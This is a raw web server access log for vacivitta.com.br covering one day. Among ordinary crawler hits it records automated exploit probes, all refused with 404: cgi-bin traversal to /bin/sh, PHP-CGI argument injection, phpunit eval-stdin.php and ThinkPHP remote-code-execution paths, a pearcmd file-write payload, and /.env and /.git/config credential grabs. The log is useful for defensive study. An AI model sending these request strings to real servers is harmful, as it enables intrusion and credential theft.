146.190.223.218 - - [01/May/2025:03:41:51 -0300] "GET /systembc/password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
146.190.223.218 - - [01/May/2025:03:41:51 -0300] "GET /password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
154.81.156.7 - - [01/May/2025:03:50:06 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
191.96.227.39 - - [01/May/2025:03:58:51 -0300] "GET /.env HTTP/1.1" 404 - "-" "python-requests/2.31.0"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:04:23:04 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:05:07:12 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [01/May/2025:05:22:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.91.127.81 - - [01/May/2025:05:31:12 -0300] "CONNECT api.ip.pn:443 HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:05:32:26 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [01/May/2025:05:42:50 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [01/May/2025:05:43:44 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
104.234.115.90 - - [01/May/2025:06:07:46 -0300] "GET / HTTP/1.0" 200 488 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
104.234.115.90 - - [01/May/2025:06:07:58 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
104.234.115.90 - - [01/May/2025:06:08:17 -0300] "GET / HTTP/1.1" 200 488 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:06:12:48 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
93.174.93.12 - - [01/May/2025:06:13:55 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (Linux; U; Android 2.3.3; ko-kr; SHW-M250S Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
vacivitta.com.br:80
104.234.115.90 - - [01/May/2025:06:14:02 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
104.234.115.90 - - [01/May/2025:06:14:10 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
43.153.7.191 - - [01/May/2025:06:29:39 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
80.82.77.202 - - [01/May/2025:06:37:42 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
185.218.86.4 - - [01/May/2025:06:49:23 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.84.178 - - [01/May/2025:06:52:49 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:06:54:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
93.174.93.12 - - [01/May/2025:07:16:38 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:07:27:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
142.93.152.2 - - [01/May/2025:07:27:49 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
142.93.152.2 - - [01/May/2025:07:27:49 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
130.211.108.162 - - [01/May/2025:07:36:38 -0300] "GET / HTTP/1.1" 200 488 "-" "python-requests/2.32.3"
vacivitta.com.br:80
154.81.156.35 - - [01/May/2025:07:38:27 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.7 - - [01/May/2025:07:52:31 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
167.94.138.204 - - [01/May/2025:07:53:12 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.204 - - [01/May/2025:07:53:14 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.204 - - [01/May/2025:07:53:18 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.204 - - [01/May/2025:07:53:19 -0300] "PRI * HTTP/2.0" 404 - "-" "-"
vacivitta.com.br:80
167.94.138.204 - - [01/May/2025:07:53:25 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.204 - - [01/May/2025:07:53:26 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:08:12:02 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
39.88.247.115 - - [01/May/2025:08:26:07 -0300] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
39.88.247.115 - - [01/May/2025:08:26:22 -0300] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
39.88.247.115 - - [01/May/2025:08:26:36 -0300] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:08:41:35 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
194.187.176.107 - - [01/May/2025:09:27:06 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:09:28:50 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
43.135.145.117 - - [01/May/2025:09:32:17 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
185.218.86.4 - - [01/May/2025:09:40:45 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [01/May/2025:09:53:53 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:09:57:34 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.84.178 - - [01/May/2025:10:03:56 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
34.38.121.245 - - [01/May/2025:10:17:39 -0300] "GET / HTTP/1.1" 200 488 "-" "python-requests/2.32.3"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:10:40:56 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.7 - - [01/May/2025:10:57:21 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
185.242.226.154 - - [01/May/2025:10:59:04 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:11:15:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:11:55:34 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [01/May/2025:12:11:26 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [01/May/2025:12:12:26 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:12:13:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
172.202.118.46 - - [01/May/2025:12:15:14 -0300] "GET /portal/redlion HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:12:51:52 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
45.56.103.154 - - [01/May/2025:13:01:27 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
45.56.103.154 - - [01/May/2025:13:02:56 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/605.1.15 (KHTML"
vacivitta.com.br:80
45.56.103.154 - - [01/May/2025:13:02:56 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/605.1.15 (KHTML"
vacivitta.com.br:80
45.56.103.154 - - [01/May/2025:13:03:06 -0300] "\x16\x03\x01\x02" 404 - "-" "-"
vacivitta.com.br:80
45.56.103.154 - - [01/May/2025:13:03:17 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
45.56.103.154 - - [01/May/2025:13:03:17 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:13:23:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.7 - - [01/May/2025:13:27:26 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
51.254.59.113 - - [01/May/2025:13:46:51 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
vacivitta.com.br:80
170.106.147.63 - - [01/May/2025:13:52:32 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
185.218.84.178 - - [01/May/2025:13:57:36 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:13:59:44 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [01/May/2025:14:21:25 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [01/May/2025:14:22:17 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
154.81.156.35 - - [01/May/2025:14:23:44 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:29:59 -0300] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:00 -0300] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:00 -0300] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:00 -0300] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:01 -0300] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:01 -0300] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:01 -0300] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:02 -0300] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:02 -0300] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:02 -0300] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:03 -0300] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:03 -0300] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:03 -0300] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:03 -0300] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:04 -0300] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:04 -0300] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:04 -0300] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:04 -0300] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:05 -0300] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:05 -0300] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:05 -0300] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:05 -0300] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:06 -0300] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:06 -0300] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:06 -0300] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:06 -0300] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:07 -0300] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:07 -0300] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:07 -0300] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:08 -0300] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:08 -0300] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:09 -0300] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:09 -0300] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:09 -0300] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:10 -0300] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:10 -0300] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:10 -0300] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:10 -0300] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:11 -0300] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:11 -0300] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:11 -0300] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:11 -0300] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:12 -0300] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:12 -0300] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
34.34.185.61 - - [01/May/2025:14:30:12 -0300] "GET /containers/json HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:14:46:12 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.7 - - [01/May/2025:14:54:06 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
185.218.86.4 - - [01/May/2025:14:58:57 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
89.25.35.70 - - [01/May/2025:15:01:52 -0300] "GET / HTTP/1.1" 200 488 "-" "Hello-World/1.0"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:15:30:55 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [01/May/2025:15:41:00 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1"
vacivitta.com.br:80
154.81.156.54 - - [01/May/2025:15:52:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.7 - - [01/May/2025:16:10:18 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
147.185.132.28 - - [01/May/2025:16:11:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
59.183.121.170 - - [01/May/2025:16:15:43 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
vacivitta.com.br:80
